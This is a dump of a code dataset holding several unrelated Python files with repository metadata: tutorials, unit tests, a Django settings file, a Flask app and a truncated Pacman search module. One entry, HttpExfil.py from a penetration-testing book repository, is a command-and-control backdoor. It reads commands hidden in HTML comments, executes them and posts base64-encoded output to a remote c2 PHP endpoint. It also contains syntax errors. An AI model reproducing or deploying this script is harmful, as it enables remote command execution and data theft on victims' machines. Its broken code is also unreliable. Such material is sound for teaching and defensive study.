blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
05c42897a43ef1cd339385cd1d08994c838bd27a
|
454de23b97631718c7c7795fdef14881e5758d22
|
/Unit 3/fileIO.py
|
f523092c0042ed435999e78fc9b1e02607f2f1cd
|
[] |
no_license
|
dhruv3/IntroToPython
|
0ac7ab132abd89eb99e86dd62ccc884f454d2701
|
620d05269f33a1f8003986af87cb956b217359ec
|
refs/heads/master
| 2021-01-22T05:43:18.095945
| 2017-05-18T13:30:35
| 2017-05-18T13:30:35
| 81,695,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
#
#File I/O stuff
#
#Method 1
infile = 'testTextFile.txt'
f = open(infile, 'r')
data = f.read()
f.close()
print(data)
#len gives total char in the string data
print(len(data))
#clean the data
data = data.replace('"', '')
dataList = data.split(', ')
print(dataList)
print(len(dataList))
#Method 2
with open("testNum.txt", "r") as f:
for line in f:
print(line)
#write to a file
of = open("newOPFile.txt", "w")
with open("testNum.txt", "r") as f:
for line in f:
tempStr = line;
of.write(tempStr)
of.close()
#of we dont close we wont be able to write into our file
#this is because data we "wrote" stays in RAM and is only written to harddrive after file is closed
|
[
"dhruv.mnit@gmail.com"
] |
dhruv.mnit@gmail.com
|
a722c34d1eb09a9e71cc919a6734cf38c3fe7d9a
|
bcc1f398423b7107dc54b3046fa49029b416fba2
|
/Module 3/Chapter 8/HttpExfil.py
|
9b8d7d24874df32cc0cf0c653201baaea33956cf
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
PacktPublishing/Python-Penetration-Testing-for-Developers
|
d81432bd276366fb606e0d2231956c2770b2952c
|
a712d19c9587d04e13b332adbc3620c0df477c89
|
refs/heads/master
| 2023-02-18T20:10:37.725636
| 2023-01-30T08:36:57
| 2023-01-30T08:36:57
| 68,084,109
| 43
| 37
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 521
|
py
|
import requests
import re
import subprocess
import time
import os
while 1:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)
for comment in comments:
if comment = " ":
os.delete(__file__)
else:
try:
response = subprocess.check_output(comment.split())
except:
response = “command fail”
data={"comment":(''.join(response)).encode("base64")}
newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
time.sleep(30)
|
[
"jayeshs@packtpub.net"
] |
jayeshs@packtpub.net
|
5c9f9ce0e28a0947dd8edbcea57820ca55c76184
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/KCB_YCHF/KCB_YCHF_MM/SHOffer/YCHF_KCBYCHF_SHBP_153.py
|
57c5b458804546c0a77bf642879eaa200c682c30
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,568
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test//xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test//service")
from ServiceConfig import *
from ARmainservice import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test//mysql")
from CaseParmInsertMysql import *
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test//utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
from env_restart import *
class YCHF_KCBYCHF_SHBP_153(xtp_test_case):
def setUp(self):
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YCHF_KCBYCHF_SHBP_153')
#clear_data_and_restart_all()
#Api.trade.Logout()
#Api.trade.Login()
pass
#
def test_YCHF_KCBYCHF_SHBP_153(self):
title = '重启上海报盘(沪A最优五档即成转限价:分笔成交_累积成交金额 >= 手续费 且手续费小于最小值)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': queryOrderErrorMsg(0),
'是否生成报单': '是',
'是否是撤废': '否',
# '是否是新股申购': '',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('688011', '1', '4', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'报单测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
print(stkparm['错误原因'])
self.assertEqual(rs['报单测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':5,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_LIMIT'],
'price': stkparm['涨停价'],
'quantity': 300,
'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['报单测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
## 还原可用资金
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YW_KCB_BAK_000')
#oms_restart()
self.assertEqual(rs['报单测试结果'], True) # 211
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
67036aa7f5e73b06e2cc28232521344169dd679e
|
5006a6965c21e5b828300eedf907eb55ec5b8b27
|
/bnpy/callbacks/CBCalcHeldoutMetricsTopicModel.py
|
57f0d662cfa836d5634ada5bdb6b7f599e3c9e2c
|
[
"BSD-3-Clause"
] |
permissive
|
birlrobotics/bnpy
|
1804d0fed9c3db4c270f4cd6616b30323326f1ec
|
8f297d8f3e4a56088d7755134c329f63a550be9e
|
refs/heads/master
| 2021-07-09T14:36:31.203450
| 2018-02-09T07:16:41
| 2018-02-09T07:16:41
| 96,383,050
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,802
|
py
|
'''
CBCalcHeldoutMetricsTopicModel.py
Learning alg callback extension for fitting topic models on heldout data.
When applied, will perform heldout inference at every parameter-save checkpoint.
Usage
--------
Add the following keyword arg to any call to bnpy.run
--customFuncPath CBCalcHeldoutMetricsTopicModel.py
Example
-------
$ python -m bnpy.Run BarsK10V900 FiniteTopicModel Mult VB \
--K 10 --nLap 50 \
--saveEvery 10 \
--customFuncPath CBCalcHeldoutMetricsTopicModel
Notes
--------
Uses the custom-function interface for learning algorithms.
This interface means that the functions onAlgorithmComplete and onBatchComplete
defined here will be called at appropriate time in *every* learning algorithm.
See LearnAlg.py's eval_custom_function for details.
'''
from __future__ import print_function
import os
import numpy as np
import scipy.io
import InferHeldoutTopics
import HeldoutMetricsLogger
SavedLapSet = set()
def onAlgorithmComplete(**kwargs):
''' Runs at completion of the learning algorithm.
Keyword Args
--------T
All workspace variables passed along from learning alg.
'''
if kwargs['lapFrac'] not in SavedLapSet:
runHeldoutCallback(**kwargs)
def onBatchComplete(**kwargs):
''' Runs viterbi whenever a parameter-saving checkpoint is reached.
Keyword Args
--------
All workspace variables passed along from learning alg.
'''
global SavedLapSet
if kwargs['isInitial']:
SavedLapSet = set()
HeldoutMetricsLogger.configure(
**kwargs['learnAlg'].BNPYRunKwArgs['OutputPrefs'])
if not kwargs['learnAlg'].isSaveParamsCheckpoint(kwargs['lapFrac'],
kwargs['iterid']):
return
if kwargs['lapFrac'] in SavedLapSet:
return
SavedLapSet.add(kwargs['lapFrac'])
runHeldoutCallback(**kwargs)
def runHeldoutCallback(**kwargs):
''' Run heldout metrics evaluation on test dataset.
Kwargs will contain all workspace vars passed from the learning alg.
Keyword Args
------------
hmodel : current HModel object
Data : current Data object
representing *entire* dataset (not just one chunk)
Returns
-------
None. MAP state sequences are saved to a MAT file.
Output
-------
MATfile format: Lap0020.000MAPStateSeqs.mat
'''
taskpath = kwargs['learnAlg'].savedir
for splitName in ['validation', 'test']:
elapsedTime = kwargs['learnAlg'].get_elapsed_time()
InferHeldoutTopics.evalTopicModelOnTestDataFromTaskpath(
dataSplitName=splitName,
taskpath=taskpath,
elapsedTime=elapsedTime,
queryLap=kwargs['lapFrac'],
printFunc=HeldoutMetricsLogger.pprint,
**kwargs)
|
[
"hongminwu0120@gmail.com"
] |
hongminwu0120@gmail.com
|
69991130e0c5ea9538a163c831d2b0caa0fd1571
|
8c5f5cf4ef550062d5511dd848d250b4f54918dd
|
/krishna/settings.py
|
7956897358d0b28eb652179b32ba4c6438fb3f22
|
[] |
no_license
|
krishnagopaldubey/fuzzysearchwithgetmethod
|
af18c9c1834e0a367e1eb3ff5454ea946fb01376
|
116589b684e78e5d0c4f8f05fcd0d83a2ba3e9c6
|
refs/heads/master
| 2020-08-12T06:56:51.493043
| 2019-10-12T20:34:27
| 2019-10-12T20:34:27
| 214,711,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,125
|
py
|
"""
Django settings for krishna project.
Generated by 'django-admin startproject' using Django 2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&cv==od%vopf$i^i!lces9u1^(303y)0jezopp!3p!6qqsg&*s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'polls',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'krishna.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'krishna.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"krishna@dolphinfoundry.com"
] |
krishna@dolphinfoundry.com
|
f6feb1566f4a0b2b2e1860b1005500bb45004b68
|
79429bd1c124044572bef9d1062d145c01e20b24
|
/ex026.py
|
d7d2e948a9f0c2b06d59b7d78ecec3325b3eb7ee
|
[] |
no_license
|
xxweell/exerciciosPython
|
b6fe00d67a39391bb8794953832f07f7f75eb504
|
93c1ac25dc1d1875c4102e1126fa54a537bb0973
|
refs/heads/master
| 2022-11-14T20:30:13.587004
| 2020-06-17T21:06:59
| 2020-06-17T21:06:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 353
|
py
|
frase = str(input('Digite uma frase: ')).strip().upper()
print('A letra A aparece {} vezes na frase.'.format(frase.count('A')))
print('A primeira letra A apareceu na posição {}.'.format(frase.find('A')+1)) # find retorna a posição em que foi encontrado a primeira vez
print('A última letra A apareceu na posição {}.'.format(frase.rfind('A')+1))
|
[
"wellingtoncw7@gmail.com"
] |
wellingtoncw7@gmail.com
|
ad3c6e6becb9b5646766ed2063c8d949313bda56
|
aee573c81dc297a97772b99cd90e05d494b25f77
|
/learnpython/matplotlib/demo_plot_2.py
|
e5879a3c9928961f2b12810475ab9a793f96f56e
|
[] |
no_license
|
YuxuanSu-Sean/learning
|
6df9d7b348e3f6c8cad0347e222c1ed244c92332
|
1356b85c2b673925f1fc89ff45f54fb499d342d0
|
refs/heads/master
| 2022-11-13T14:08:17.808037
| 2022-11-10T05:15:16
| 2022-11-10T05:15:16
| 204,625,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 82
|
py
|
import matplotlib.pyplot as plt
fig = plt.figure()
ax1 = fig.add_subplot(111)
|
[
"497572121@qq.com"
] |
497572121@qq.com
|
053950d8dee6b200c63e069154c6d9c6ba7b21af
|
02442f7d3bd75da1b5b1bf6b981cc227906a058c
|
/rocon/build/rocon_app_platform/rocon_app_manager/catkin_generated/pkg.develspace.context.pc.py
|
3de9876b63c7300094cd88e5c7d2b10e59c73d88
|
[] |
no_license
|
facaisdu/RaspRobot
|
b4ff7cee05c70ef849ea4ee946b1995432a376b7
|
e7dd2393cdabe60d08a202aa103f796ec5cd2158
|
refs/heads/master
| 2020-03-20T09:09:28.274814
| 2018-06-14T08:51:46
| 2018-06-14T08:51:46
| 137,329,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rocon_app_manager"
PROJECT_SPACE_DIR = "/home/sclab_robot/turtlebot_ws/rocon/devel"
PROJECT_VERSION = "0.8.0"
|
[
"facai_sdu@126.com"
] |
facai_sdu@126.com
|
998e74d73408d3c5bf3bf99ce5df17a7a52ee3f8
|
0a40a0d63c8fce17f4a686e69073a4b18657b160
|
/test/functional/rpc_bip38.py
|
b70349a25ed83fb3fc00d631b1bc8dcd9eb3f3e4
|
[
"MIT"
] |
permissive
|
MotoAcidic/Cerebellum
|
23f1b8bd4f2170c1ed930eafb3f2dfff07df1c24
|
6aec42007c5b59069048b27db5a8ea1a31ae4085
|
refs/heads/main
| 2023-05-13T06:31:23.481786
| 2021-06-09T15:28:28
| 2021-06-09T15:28:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The CEREBELLUM developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import CerebellumTestFramework
from test_framework.util import assert_equal
class Bip38Test(CerebellumTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
password = 'test'
address = self.nodes[0].getnewaddress()
privkey = self.nodes[0].dumpprivkey(address)
self.log.info('encrypt address %s' % (address))
bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
self.log.info('decrypt bip38 key %s' % (bip38key))
assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
Bip38Test().main()
|
[
"travisfinch01@gmail.com"
] |
travisfinch01@gmail.com
|
2bcd1788de6e9a593abedae6ed61b48c43c67654
|
06d6c9346331e392f6d8067eb9ee52d38ae5fab8
|
/carver/pe/setup.py
|
299b8bff264703b5031d4a1ddd6b11e7c4e69e92
|
[
"Apache-2.0"
] |
permissive
|
maydewd/stoq-plugins-public
|
5d5e824dda0c78acab4ff9aef72f567e6b85e555
|
8b2877b5091ae731437ef35a95d4debdbf0a19f3
|
refs/heads/master
| 2020-03-22T18:57:41.061748
| 2018-06-12T14:36:42
| 2018-06-12T14:36:42
| 140,494,475
| 0
| 0
|
Apache-2.0
| 2018-07-10T22:39:08
| 2018-07-10T22:39:08
| null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
from setuptools import setup, find_packages
setup(
name="pe",
version="0.10",
author="Jeff Ito, Marcus LaFerrera (@mlaferrera)",
url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
license="Apache License 2.0",
description="Carve portable executable files from a data stream",
packages=find_packages(),
include_package_data=True,
)
|
[
"marcus@randomhack.org"
] |
marcus@randomhack.org
|
bb53fe452117f99a8d8f7b1e33f47e1ab79db0c2
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Cron_Philip/Assignments/flaskolympics/olympics3/server.py
|
3c8cc483f0488a3e80700542e08036210ca2f614
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967
| 2016-10-18T21:54:39
| 2016-10-18T21:54:39
| 173,706,702
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
from flask import Flask, render_template, session
app = Flask(__name__)
app.secret_key = 'ThisIsSecret'
@app.route('/')
def myfirstfunction():
if not 'title' in session:
session['title'] = 'hello world'
return render_template('index.html', name="Mike")
if __name__ == '__main__':
app.run(debug = True)
|
[
"43941751+curest0x1021@users.noreply.github.com"
] |
43941751+curest0x1021@users.noreply.github.com
|
973f38ed0345cb23c877e3d788c07856de7093ea
|
aa97a1a30d3f4cc65b80cfbb76ff88f55e96f67b
|
/A-Star-Search/search/searchAgents.py
|
bf0c1649b6b366a5fb4c716f1af59a0f9fa5d13a
|
[] |
no_license
|
yorhaha/AI-Tasks
|
a0df0728ef013fd8053d3ef699b04baa38b931ce
|
6197b9990f997bcf9f3f5ccb6773513670b35ea0
|
refs/heads/main
| 2023-09-03T16:50:48.365762
| 2021-10-30T02:04:13
| 2021-10-30T02:04:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,856
|
py
|
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
aStarSearch or astar
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError(fn + ' is not a search function in search.py.')
func = getattr(search, fn)
if 'heuristic' not in func.__code__.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception("No search function provided for SearchAgent")
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActionSequence(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, child
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print('Warning: this does not look like a regular search maze')
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def expand(self, state):
"""
Returns child states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(child, action, stepCost), where 'child' is a
child to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that child
"""
children = []
for action in self.getActions(state):
nextState = self.getNextState(state, action)
cost = self.getActionCost(state, action, nextState)
children.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return children
def getActions(self, state):
possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
valid_actions_from_state = []
for action in possible_directions:
x, y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
valid_actions_from_state.append(action)
return valid_actions_from_state
def getActionCost(self, state, action, next_state):
assert next_state == self.getNextState(state, action), (
"Invalid next state passed to getActionCost().")
return self.costFn(next_state)
def getNextState(self, state, action):
assert action in self.getActions(state), (
"Invalid action passed to getActionCost().")
x, y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
return (nextx, nexty)
def getCostOfActionSequence(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
# Check figure out the next state and see whether its' legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def expand(self, state):
"Returns child states, the actions they require, and a cost of 1."
children = []
self._expanded += 1 # DO NOT CHANGE
for action in self.getActions(state):
next_state = self.getNextState(state, action)
action_cost = self.getActionCost(state, action, next_state)
children.append( ( next_state, action, action_cost) )
return children
def getActions(self, state):
possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
valid_actions_from_state = []
for action in possible_directions:
x, y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
valid_actions_from_state.append(action)
return valid_actions_from_state
def getActionCost(self, state, action, next_state):
assert next_state == self.getNextState(state, action), (
"Invalid next state passed to getActionCost().")
return 1
def getNextState(self, state, action):
assert action in self.getActions(state), (
"Invalid action passed to getActionCost().")
x, y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
return ((nextx, nexty), nextFood)
def getCostOfActionSequence(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem: FoodSearchProblem):
"""
Your heuristic for the FoodSearchProblem goes here.
This heuristic must be consistent to ensure correctness. First, try to come
up with an admissible heuristic; almost all admissible heuristics will be
consistent as well.
If using A* ever finds a solution that is worse uniform cost search finds,
your heuristic is *not* consistent, and probably not admissible! On the
other hand, inadmissible or inconsistent heuristics may find optimal
solutions, so be careful.
The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
(see game.py) of either True or False. You can call foodGrid.asList() to get
a list of food coordinates instead.
If you want access to info like walls, capsules, etc., you can query the
problem. For example, problem.walls gives you a Grid of where the walls
are.
If you want to *store* information to be reused in other calls to the
heuristic, there is a dictionary called problem.heuristicInfo that you can
use. For example, if you only want to count the walls once and store that
value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
Subsequent calls to this heuristic can access
problem.heuristicInfo['wallCount']
"""
position, foodGrid = state
"*** YOUR CODE HERE ***"
# TODO: Finished
def getDistance(pos1, pos2, gameStartState):
childProblem = PositionSearchProblem(gameStartState, start=pos1, goal=pos2, warn=False, visualize=False)
solution = search.breadthFirstSearch(childProblem)
return len(solution)
value = 0
for x in range(foodGrid.width):
